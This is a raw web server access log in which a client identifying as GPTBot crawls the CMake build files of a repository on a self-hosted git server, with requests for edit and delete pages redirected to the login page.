"https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:48:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:48:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11300] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:48:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:48:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:48:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 9858] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:48:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:48:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:48:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11302] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:48:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:18:48:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:18:48:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:18:48:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:18:48:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:18:48:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:18:48:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:48:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:48:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:18:48:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:18:48:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:48:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 4694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:48:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 945] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:48:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 949] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:48:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 14525] [Gzip 8.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:48:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:48:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:48:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14933] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:18:48:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11379] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:18:48:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 28166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:18:48:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 1517] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:18:48:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:18:48:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:18:48:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11228] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:18:48:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14490] [Gzip 4.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:18:48:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11312] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:18:48:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11312] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:18:48:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:48:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:48:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:48:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:48:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4766] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:18:48:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10349] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:48:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9855] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:48:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 939] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:48:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:48:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:48:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 1015] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:18:48:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9845] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:18:48:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:48:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 923] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:18:48:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 15088] [Gzip 9.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:18:48:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:18:48:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11274] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:48:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:48:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:48:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:48:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:48:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11276] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:48:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:48:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 